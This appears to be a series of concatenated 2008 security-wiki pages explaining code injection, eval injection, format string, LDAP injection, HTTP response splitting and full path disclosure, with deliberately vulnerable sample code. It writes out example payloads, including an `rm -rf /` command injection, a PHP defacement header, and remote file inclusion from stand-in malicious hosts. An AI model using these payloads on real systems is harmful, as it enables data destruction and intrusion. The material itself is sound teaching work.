* '''> /home/user/phpguru/.bashrc''' will overwrite file '''.bashrc'''.
* '''< /home/user/phpguru/.bashrc''' will send file '''.bashrc''' as input to '''funnytext'''.

PHP offers [http://www.php.net/manual/en/function.escapeshellarg.php escapeshellarg()] and [http://www.php.net/manual/en/function.escapeshellcmd.php escapeshellcmd()] to perform '''encoding''' before calling methods. However, it is not recommended to trust these methods to be secure - also validate/sanitize input.

===Example 6===
The following code is a vulnerable a eval() injection, because it don’t sanitize the user’s input (in this case: “username”), the program just save this input in txt file, and after the server will execute this file without any validation. In this case the user is able to insert a command instead of a username.

Example:
<pre><nowiki>
<%
If not isEmpty(Request( "username" ) ) Then
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(Server.MapPath( "userlog.txt" ), ForAppending, True)
f.Write Request("username") & vbCrLf
f.close
Set f = nothing
Set fso = Nothing
%>
<h1>List of logged users:</h1>
<pre>
<%
Server.Execute( "userlog.txt" )
%>
</pre>
<%
Else
%>
<form>
<input name="username" /><input type="submit" name="submit" />
</form>
<%
End If
%>
</nowiki></pre>

==Related [[Threat Agents]]==

[[:Category:Insider]]

[[:Category:outsider]]

==Related [[Attacks]]==

*[[Direct Static Code Injection]]
*[[Code Injection]]
*[[:Category:Injection Attack | Injection Attacks]]

==Related [[Vulnerabilities]]==

* [[Vulnerability 1]]
* [[Vulnerabiltiy 2]]

==Related [[Controls]]==

* [[Control 1]]
* [[Control 2]]

Note: contents of "Avoidance and Mitigation" and "Countermeasure" Sections should be placed here

==References==

*http://secunia.com/cve_reference/CVE-2006-2005/?show_result=1
* http://en.wikipedia.org/wiki/Code_injection

__NOTOC__

Direct Static Code Injection

2008-07-01T17:01:50Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

Direct Static Code Injection attack consists on injecting code directly onto the resource used by application while processing a user request. This is normally performed by tampering libraries and template files which are created based on user input without proper data sanitization.
Upon a user request to the modified resource, the actions defined on it will be executed at server side in the context of web server process.

[[Server-Side Includes (SSI) Injection | Server Side Includes]] is considered a type of direct static code injection. It should not be confused with other types of code injection, like [[Cross Site Scripting | XSS]] (“Cross Site Scripting” or “HTML injection”) where the code is executed on client side.

==Examples==

===Example 1===
This is a simple example of exploitation of CGISCRIPT.NET csSearch 2.3 vulnerability, published on Bugtraq ID: 4368.
By requesting the following URL to the server, it’s possible to execute commands defined on ‘’’’setup’’’ variable.
<br>
csSearch.cgi?command=savesetup&setup=''PERL_CODE_HERE''
<br>
For the classical example, it can be used the following command to remove all files from “/” folder:
csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`

Note that the above command must be encoded in order to be accepted.

===Example 2===
This example exploits a vulnerability on Ultimate PHP Board (UPB) 1.9 (CVE-2003-0395), which allows an attacker to execute random php code. This happens because some user variables, like IP address and User-Agent, are stored in a file that is used by admin_iplog.php page to show user statistics. When an administrator browses this page, the previously injected code by a malicious request is executed.
The following example stores a malicious PHP code that will deface index.html page when administrator browses admin_iplog.php.
GET /board/index.php HTTP/1.0
User-Agent: <? system( "echo \'hacked\' > ../index.html" ); ?>

==Related [[Threat Agents]]==

[[:Category:Insider]]

==Related [[Attacks]]==

*[[Server-Side Includes (SSI) Injection | Server Side Includes]]
*[[ Direct Dynamic Code Evaluation ('Eval Injection')]]

==Related [[Vulnerabilities]]==

[[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==

[[:Category:Input Validation]]

[[Category:Injection]]
[[Category:Attack]]

==References==

* http://www.seclab.tuwien.ac.at/advisories/TUVSA-0510-001.txt

* http://marc.info/?l=bugtraq&m=105379741528925&w=2

* http://archives.neohapsis.com/archives/bugtraq/2005-06/0002.html

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

Direct Dynamic Code Evaluation ('Eval Injection')

2008-07-01T17:00:40Z

Edualves: /* Related Threat Agents */

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

This attack consists in a script does not properly validate user inputs in the page parameter. A remote user can supply a specially crafted URL to pass arbitrary code to an eval() statement which results in code execution.

Note 1: This attack will execute the code with the same permission like the target web service, including operation system commands.

Note 2: Eval injection is prevalent in handler/dispatch procedures that might want to invoke a large number of functions, or set a large number of variables.

==Examples==

===Example 1===
In this example an attacker can control all or part of an input string that is fed into an eval() function call

<pre><nowiki>
$myvar = "varname";
$x = $_GET['arg'];
eval("\$myvar = \$x;");
</nowiki></pre>

The argument of "eval" will be processed as PHP, so additional commands can be appended. For example, if "arg" is set to "10 ; system(\"/bin/echo uh-oh\");", additional code is run which executes a program on the server, in this case "/bin/echo".

===Example 2===
The following is a example of [[SQL Injection]], consider a web page has two fields to allow users to enter a Username and a Password. The code behind the page will generate a SQL query to check the Password against the list of Usernames:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password'

If this query returns exactly one row, then access is granted. However, if the malicious user enters a valid Username and injects some valid code ("' OR 1=1") in the Password field, then the resulting query will look like this:
SELECT UserList.Username
FROM UserList
WHERE
UserList.Username = 'Username'
AND UserList.Password = 'Password' OR '1'='1'

In the example above, "Password" is assumed to be blank or some innocuous string. "1=1" will always be true and many rows will be returned, thereby allowing access. The final inverted comma will be ignored by the SQL parser. The technique may be refined to allow multiple statements to run, or even to load up and run external programs.

===Example 3===
This is a example of a file was injected. Consider this PHP program (which includes a file specified by request):

<pre><nowiki>
<?php
$color = 'blue';
if ( isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>
<form>
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
</nowiki></pre>

The developer thought this would ensure that only blue.php and red.php could be loaded. But as anyone can easily insert arbitrary values in COLOR, it is possible to inject code from files:

* <code>/vulnerable.php?COLOR='''<nowiki>http://evil/exploit</nowiki>'''</code> - injects a remotely hosted file containing an exploit.

* <code>/vulnerable.php?COLOR='''C:\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit.

* <code>/vulnerable.php?COLOR='''..\..\..\..\ftp\upload\exploit'''</code> - injects an uploaded file containing an exploit, using [[Path Traversal]].

* <code>/vulnerable.php?COLOR='''C:\notes.txt%00'''</code> - example using Null character, Meta character to remove the <code>.php</code> suffix, allowing access to other files than .php. (PHP setting "magic_quotes_gpc = On", which is default, would stop this attack)

===Example 4===
A simple URL which demonstrate a way to do this attack:

<nowiki>http://some-page/any-dir/index.php?page=<?include($s);?>&s=http://malicious-page/cmd.txt? </nowiki>

===Example 5===
Shell Injection applies to most systems which allows software to programmatically execute Command line. Typical sources of Shell Injection is calls system(), StartProcess(), java.lang.Runtime.exec() and similar APIs.

Consider the following short PHP program, which runs an external program called '''funnytext''' to replace a word the user sent with some other word)

<pre><nowiki>
<HTML>
<?php
passthru ( " /home/user/phpguru/funnytext "
. $_GET['USER_INPUT'] );
?>
</nowiki></pre>

This program can be injected in multiple ways:
* '''`command`''' will execute '''command'''.
* '''$(command)''' will execute '''command'''.
* '''; command''' will execute '''command''', and output result of command.
* '''| command''' will execute '''command''', and output result of command.
* '''&& command''' will execute '''command''', and output result of command.
* '''|| command''' will execute '''command''', and output result of command.
* '''> /home/user/phpguru/.bashrc''' will overwrite file '''.bashrc'''.
* '''< /home/user/phpguru/.bashrc''' will send file '''.bashrc''' as input to '''funnytext'''.

PHP offers [http://www.php.net/manual/en/function.escapeshellarg.php escapeshellarg()] and [http://www.php.net/manual/en/function.escapeshellcmd.php escapeshellcmd()] to perform '''encoding''' before calling methods. However, it is not recommended to trust these methods to be secure - also validate/sanitize input.

===Example 6===
The following code is a vulnerable a eval() injection, because it don’t sanitize the user’s input (in this case: “username”), the program just save this input in txt file, and after the server will execute this file without any validation. In this case the user is able to insert a command instead of a username.

Example:
<pre><nowiki>
<%
If not isEmpty(Request( "username" ) ) Then
Const ForReading = 1, ForWriting = 2, ForAppending = 8
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(Server.MapPath( "userlog.txt" ), ForAppending, True)
f.Write Request("username") & vbCrLf
f.close
Set f = nothing
Set fso = Nothing
%>
<h1>List of logged users:</h1>
<pre>
<%
Server.Execute( "userlog.txt" )
%>
</pre>
<%
Else
%>
<form>
<input name="username" /><input type="submit" name="submit" />
</form>
<%
End If
%>
</nowiki></pre>

==Related [[Threat Agents]]==

[[:Category:Insider]]

==Related [[Attacks]]==

*[[Direct Static Code Injection]]
*[[Code Injection]]
*[[:Category:Injection Attack | Injection Attacks]]

==Related [[Vulnerabilities]]==

* [[Vulnerability 1]]
* [[Vulnerabiltiy 2]]

==Related [[Controls]]==

* [[Control 1]]
* [[Control 2]]

Note: contents of "Avoidance and Mitigation" and "Countermeasure" Sections should be placed here

==References==

*http://secunia.com/cve_reference/CVE-2006-2005/?show_result=1
* http://en.wikipedia.org/wiki/Code_injection

__NOTOC__

Format string attack

2008-06-24T22:10:29Z

Edualves:

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

The Format String exploit occurs when the submitted data of an input string is evaluated as a command by the application. This way, the attacker could execute code, read the stack or cause segmentation fault in the running application, causing new behaviors that could compromise the security or the stability of the system.

To understand the attack it’s necessary to explain the components that constitute it. They are:
•The '''Format Function''' is an ANSI C conversion function, like '''printf, fprintf''', which converts primitive variable of the programming language in a human readable string representation.

•The '''Format String''' is the argument of the Format Function and is an ASCII Z string which contains text and format parameters, like: '''printf ("The magic number is: %d\n", 1911)''';

•The '''Format String Parameter''', like '''%x %s''' defines the type of conversion of the format function.

The attack could be executed when the application doesn’t validate properly the submitted input. In this case if a Format Strings parameter, like %x, is inserted in the posted data, the string is parsed by the Format Function the conversion specified in the parameters is executed. However, the Format Function is expecting more arguments as input, and if these arguments are not supplied, the function could read or write the stack.

This way is possible to define a well crafted input that could change the behavior of the format function permitting the attacker to cause deny of service or to execute arbitrary commands.

If the application uses Format Functions in the source-code which is able to interpret formatting characters, the attacker could explore the vulnerability inserting formatting characters in a form of the website. For example, the '''printf''' function is used to print the username inserted in some fields of the page, the website could be vulnerable to this kind of attack, as showed below:

printf (userName);

Following some examples in the table 2 of Format Functions, which if not treated can expose the application to the Format String Attack.

{|border="1" cellpadding="20" cellspacing="0"
!Format function
!Description
|-
|fprint
|Writes the printf to a file
|-
|printf
|Output a formatted string
|-
|sprintf
|Prints into a string
|-
|snprintf
|Prints into a string checking the length
|-
|vfprintf
|Prints the a va_arg structure to a file
|-
|vprintf
|Prints the va_arg structure to stdout
|-
|vsprintf
|Prints the va_arg to a string
|-
|vsnprintf
|Prints the va_arg to a string checking the length
|}

'''Table 1. Format Functions'''

Below there are some format parameters which can be used and its consequences:

•"%x" Read data from the stack

•"%s" Read character strings from the process' memory

•"%n" Write an integer to locations in the process' memory

To discover whether the application is vulnerable to this type of attack, it´s necessary to verify if the format function accepts and parses the format string parameters show in the table 2.

Format strings parameters:
{|border="1" cellpadding="20" cellspacing="0"
!Parameters
!Output
!Passed as
|-
|%%
|% character (literal)
|Reference
|-
|%p
|External representation of a pointer to void
|Reference
|-
|%d
|Decimal
|Value
|-
|%c
|Character
|
|-
|%u
|Unsigned decimal
|Value
|-
|%x
|Hexadecimal
|Value
|-
|%s
|String
|Reference
|-
|%n
|Writes the number of characters into a pointer
|Reference
|}
'''Table 2. Common parameters use to Format String Attack.'''

==Examples==

===Example1===
The example has the intention to demonstrate how the application can behave when the format function does not receive the necessary treatments for the validation in the input of format string.

First it will be shown the application operating with normal behavior and normal inputs, then, the application operating when the attacker input the format string and the resultant behavior.

Below it will be presented the source-code used for the example.
#include <stdio.h>
#include <string.h>
#include <stlib.h>

int main (int argc, char **argv)
{
char buf [100]
int x = 1
snprintf ( buf, sizeof buf, argv [1] ) ;
buf [ sizeof buf -1 ] = 0
printf ( “Buffer size is: (%d) \nData input: %s \n” , strlen (buf) , buf ) ;
printf ( “X equals: %d/ in hex: %#x\nMemory address for x: (%p) \n” , x, x, &x) ;
return 0 ;
}

Next it will be presented the output that the program supplies when running with expected inputs. In this case the program received the string “Bob” as input and returned it in the output.

./formattest “Bob”

Buffer size is (16)
Data input : Bob
X equals: 1/ in hex: 0x1
Memory address for x (0xbffff73c)

Now the format string vulnerability will be explored. If the format string parameter “%x %x” is inserted in the input string, when the format function parses the argument, the output will display the name Bob, but instead of showing the %x string, the application will show the content of a memory address.

./formattest “Bob %x %x”

Buffer size is (27)
Data input : Bob bffff 8740
X equals: 1/ in hex: 0x1
Memory address for x (0xbffff73c)

The inputs Bob and the format strings parameters will be attributed to the variable buf inside of the code which should take place of the %s in the Data input. So now the printf argument looks like:

printf ( “Buffer size is: (%d) \n Data input: Bob %x %x \n” , strlen (buf) , buf ) ;

When the application prints the results, the format function will interpret the format strings inputs showing the content of a memory address.

==Example 2==
'''Denial of Service'''

In this case, when an invalid address of memory is requested, normally the program is terminated, taking this as an example in a function:

printf (userName);

The attacker could insert a sequence of format strings, making the program to show the memory address where a lot of other data are stored, then, the attacker increases the possibilities of the program to read an illegal address, crashing the program and causing its non-availability.

printf (%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s);

==Related [[Threat Agents]]==

[[:Category:Input Validation]]

==Related [[Attacks]]==

[[Code Injection]]

==Related [[Vulnerabilities]]==

[[Buffer Overflow]]

==Related [[Controls]]==

[[:Category:Input Validation ]]

==References==

*http://www.webappsec.org/projects/threat/classes/format_string_attack.shtml

* http://en.wikipedia.org/wiki/Format_string_attack

*http://seclists.org/bugtraq/2005/Dec/0030.html

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

LDAP injection

2008-06-24T22:09:52Z

Edualves:

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it’s possible to modify LDAP statements using a local proxy. This could result in the execution of arbitrary command such as granting permissions to unauthorized queries, and content modification inside the LDAP tree.
The same advanced exploitation techniques available in SQL Injection can be similarly applied in LDAP Injection.

==Examples==

===Example 1===
In a page with a user search form, the following code is responsible to catch input value and generate a LDAP query that will be used in LDAP database.

<input type="text" size=20 name="userName">Insert the username</input>

The LDAP query is narrowed down for performance and the underlying code for this function might be the following:
String ldapSearchQuery = "(cn=" + $userName + ")";
System.out.println(ldapSearchQuery);

Case the variable $userName is not validated, it could be possible accomplish LDAP injection, as follows:
*If a user puts “*” on box search, the system may return all the usernames on the LDAP base
*If a user puts “jonys) (| (password = * ) )”, it will generate the code bellow revealing jonys’ password
( cn = jonys ) ( | (password = * ) )

===Example 2===
The following vulnerable code is used in an ASP web application which provides login with LDAP data base.
On line 11, the variable userName is initialized and validated to check if it’s not in blank. Then, the content of this variable is used to construct a LDAP query used by SearchFilter on line 28. The attacker has the chance specify what will be queried on LDAP server, and see the result on the line 33 to 41, are all results and their attributes are displayed.

Commented vulnerable asp code:
<nowiki>
1. <html>
2. <body>
3. <%@ Language=VBScript %>
4. <%
5. Dim userName
6. Dim filter
7. Dim ldapObj
8.
9. Const LDAP_SERVER = "ldap.example"
10.
11. userName = Request.QueryString("user")
12.
13. if( userName = "" ) then
14. Response.Write("Invalid request. Please specify a valid
15. user name")
16. Response.End()
17. end if
18.
19. filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry
20.
21. 'Creating the LDAP object and setting the base dn
22. Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
23. ldapObj.ServerName = LDAP_SERVER
24. ldapObj.DN = "ou=people,dc=spilab,dc=com"
25.
26. 'Setting the search filter
27. ldapObj.SearchFilter = filter
28.
29. ldapObj.Search
30.
31. 'Showing the user information
32. While ldapObj.NextResult = 1
33. Response.Write("<p>")
34.
35. Response.Write("<b><u>User information for: " +
36. ldapObj.AttrValue(0) + "</u></b><br>")
37. For i = 0 To ldapObj.AttrCount -1
38. Response.Write("<b>" + ldapObj.AttrType(i) +"</b>: " +
39. ldapObj.AttrValue(i) + "<br>" )
40. Next
41. Response.Write("</p>")
42. Wend
43. %>
44. </body>
45. </html> </nowiki>

In the example above, we send the * character in the user parameter which will result in the filter variable in the code to be initialized with (uid=*). The resulting LDAP statement will make the server return any object that contains a uid attribute like username.

<nowiki> http://www.some-site.org/index.asp?user=* </nowiki>

==Related [[Threat Agents]]==

[[:Category:Information Disclosure]]

==Related [[Attacks]]==

*[[Interpreter Injection]]
*[[SQL Injection]]
*[[Command Injection]]
*[[Relative Path Traversal]]
*[[Resource Injection]]
*[[Path Manipulation]]

==Related [[Vulnerabilities]]==

[[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==

[[:Category:Input Validation]]

==References==

* http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf

* http://www.ietf.org/rfc/rfc1960.txt A String Representation of LDAP Search Filters (RFC1960)

* http://www.redbooks.ibm.com/redbooks/SG244986.html IBM RedBooks - Understanding LDAP

* http://www.webappsec.org/projects/threat/classes/ldap_injection.shtml

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__

HTTP Response Splitting

2008-06-24T22:09:19Z

Edualves:

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

HTTP response splitting vulnerabilities occur when:

* Data enters a web application through an untrusted source, most frequently an HTTP request.
* The data is included in an HTTP response header sent to a web user without being validated for malicious characters.

As with many software security vulnerabilities, HTTP response splitting is a means to an end, not an end in itself. At its root, the vulnerability is straightforward: an attacker passes malicious data to a vulnerable application, and the application includes the data in an HTTP response header.

To mount a successful exploit, the application must allow input that contains CR (carriage return, also given by %0d or \r) and LF (line feed, also given by %0a or \n)characters into the header. These characters not only give attackers control of the remaining headers and body of the response the application intends to send, but also allows them to create additional responses entirely under their control.

==Examples==

The following code segment reads the name of the author of a weblog entry, author, from an HTTP request and sets it in a cookie header of an HTTP response.

<pre>
String author = request.getParameter(AUTHOR_PARAM);
...
Cookie cookie = new Cookie("author", author);
cookie.setMaxAge(cookieExpiration);
response.addCookie(cookie);
</pre>

Assuming a string consisting of standard alpha-numeric characters, such as "Jane Smith", is submitted in the request the HTTP response including this cookie might take the following form:

<pre>
HTTP/1.1 200 OK
...
Set-Cookie: author=Jane Smith
...
</pre>

However, because the value of the cookie is formed of unvalidated user input the response will only maintain this form if the value submitted for AUTHOR_PARAM does not contain any CR and LF characters. If an attacker submits a malicious string, such as "Wiley Hacker\r\nHTTP/1.1 200 OK\r\n...", then the HTTP response would be split into two responses of the following form:

<pre>
HTTP/1.1 200 OK
...
Set-Cookie: author=Wiley Hacker

HTTP/1.1 200 OK
...
</pre>

Clearly, the second response is completely controlled by the attacker and can be constructed with any header and body content desired. The ability of attacker to construct arbitrary HTTP responses permits a variety of resulting attacks, including: cross-user defacement, web and browser cache poisoning, cross-site scripting and page hijacking.

==Related [[Threat Agents]]==

[[Client-side attacks]]

==Related [[Attacks]]==

*[[Cross-User Defacement]]
*[[Cache Poisoning]]
*[[Cross-Site Scripting]]
*[[Page Hijacking]]

==Related [[Vulnerabilities]]==

[[:Category:Input Validation Vulnerability]]

==Related [[Controls]]==

[[:Category:Input Validation]]

==References==

* http://www.infosecwriters.com/text_resources/pdf/HTTP_Response.pdf - HTTP Response Spliting

* http://www.securiteam.com/securityreviews/5WP0E2KFGK.html - Introdution to HTTP Response Spliting

* Watchfire Whitepaper: HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics Whitepaper[http://download.watchfire.com/ttl/wp/HTTPResponseSplitting.pdf?file=HTTPResponseSplitting.pdf&authToken=1214447561_257e36e250a83a8e5942584866d295ee]

==Credit==

{{Template:Fortify}}

[[Category: Protocol Manipulation]]

[[Category: Attack]]

__NOTOC__

Full Path Disclosure

2008-06-24T22:08:51Z

Edualves:

{{Template:Attack}}

Last revision: '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''

==Description==

Full Path Disclosure (AKA, FPD) vulnerabilities enable the attacker to see the path to the webroot/file. Eg: /home/omg/htdocs/file/.
Certain vulnerabilities such as using the load_file() (within an SQL injection) query to view page sources require the attacker to have the full path to the file they wish to view.

==Examples==

* '''Empty Array'''

If we have a site that uses a method of requesting a page like this:
<pre>http://site.com/index.php?page=about</pre>
We can use a method of opening and closing braces and causing the page to output an error. This method would look like this:
<pre>http://site.com/index.php?page[]=about</pre>
This renders the page defunct thus spitting out an error:
<pre>Warning: opendir(Array): failed to open dir: No such file or directory in /home/omg/htdocs/index.php on line 84
Warning: pg_num_rows(): supplied argument ... in /usr/home/example/html/pie/index.php on line 131</pre>

* '''Null Session Cookie'''

Another popular and very reliable method of producing errors containing a FPD is to give the page a nulled session using Javascript Injections.
A simple injection using this method would look something like so:
<pre>javascript:void(document.cookie="PHPSESSID=");</pre>
By simply setting the PHPSESSID cookie to nothing (null) we get an error.
<pre>Warning: session_start() [function.session-start]: The session id contains illegal characters,
valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/includes/functions.php on line 2</pre>

==Related [[Threat Agents]]==

[[:Category:Information Disclosure]]

==Related [[Attacks]]==

*[[SQL Injection]]
*[[Relative Path Traversal]]

==Related [[Vulnerabilities]]==

==Related [[Controls]]==

This vulnerability is prevented simply by turning error reporting off so your code does not spit out errors.
<pre>error_reporting(0);</pre>

==References==

* http://www.acunetix.com/vulnerabilities/Full-path-disclosure.htm

*[http://www.enigmagroup.org/ Articled summarised from Full Path Disclosure article by haZed on EnigmaGroup.org.]

*[http://www.enigmagroup.org/pages/view_articles/artID/175/ Original article location (registration required).]

[[Category:Injection]]
[[Category:Attack]]
__NOTOC__